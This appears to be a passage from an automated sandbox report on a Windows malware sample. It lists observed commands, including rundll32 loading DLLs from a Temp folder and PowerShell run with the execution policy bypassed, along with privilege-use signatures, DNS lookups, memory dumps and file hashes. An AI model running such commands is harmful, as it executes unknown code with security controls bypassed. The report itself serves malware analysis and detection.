rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCUNZL64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
117s
Max time network
143s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
memory/3700-4-0x000001A277410000-0x000001A277432000-memory.dmp
memory/3700-7-0x000001A2776D0000-0x000001A277746000-memory.dmp
memory/3700-8-0x00007FFC0F980000-0x00007FFC1036C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axv4kz30.xqb.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3700-18-0x000001A277440000-0x000001A277450000-memory.dmp
memory/3700-17-0x000001A277440000-0x000001A277450000-memory.dmp
memory/3700-31-0x000001A277440000-0x000001A277450000-memory.dmp
memory/3700-34-0x00007FFC0F980000-0x00007FFC1036C000-memory.dmp
memory/3700-35-0x000001A277440000-0x000001A277450000-memory.dmp
memory/3700-36-0x000001A277440000-0x000001A277450000-memory.dmp
memory/3700-37-0x000001A277440000-0x000001A277450000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
137s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
memory/1080-4-0x00000198FE510000-0x00000198FE532000-memory.dmp
memory/1080-5-0x00007FF881A50000-0x00007FF88243C000-memory.dmp
memory/1080-6-0x00000198FE490000-0x00000198FE4A0000-memory.dmp
memory/1080-7-0x00000198FE490000-0x00000198FE4A0000-memory.dmp
memory/1080-10-0x00000198FE6C0000-0x00000198FE736000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p1jkdy1s.3q4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1080-31-0x00000198FE490000-0x00000198FE4A0000-memory.dmp
memory/1080-35-0x00007FF881A50000-0x00007FF88243C000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.79.70.13.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
119s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 28.73.42.20.in-addr.arpa | udp |